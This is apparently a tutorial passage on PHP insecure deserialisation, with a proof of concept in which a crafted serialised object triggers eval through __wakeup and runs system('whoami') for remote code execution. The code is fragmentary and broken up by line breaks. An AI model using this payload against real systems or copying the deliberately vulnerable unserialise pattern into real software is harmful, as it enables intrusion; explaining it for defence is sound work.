First of all, let's explain what serialisation and deserialisation mean. The serialisation of an object transforms an object from Object Programming languages such as Java, Python or PHP into a format that can be stored or transferred. Deserailsation turns serialised objects from files or the network into ordinary programming objects.
An attacker could manipulate serialised objects to change the application's logic, perform a denial service, or execute arbitrary code when deserialised.
When you control a serialised object that is passed into unserialised(), you can control the properties of the created object. You might also be able to hijack the flow of the application by controlling the values passed into automatically executed methods like __wakeup(), or __destruct().
In this Proof of concept, the vulnerable code receives a serialised object through the GET parameter
r, then unserialises it into an array, printing the first two values. However, an attacker could create its own
injectvariable, which value will be executed by the function
evaljust after the
unserializefunction was performed due to the function
echo "<br/>".$var1." - ".$var1;
echo ""; # nothing happens here
php -S localhost:8080 vuln.php
public $inject = "system('whoami');";
echo urlencode(serialize(array("vul","nerable"))); # Basic serialized data
echo urlencode(serialize(new PHPObjectInjection)); # Command execution (__wakeup)
# Intended use
# Malicious use
As you can see below, because the attacker could replace the
$injectvariable with the command "whoami", the attacker gained RCE knowing the user who executed the PHP service.
vul - nerable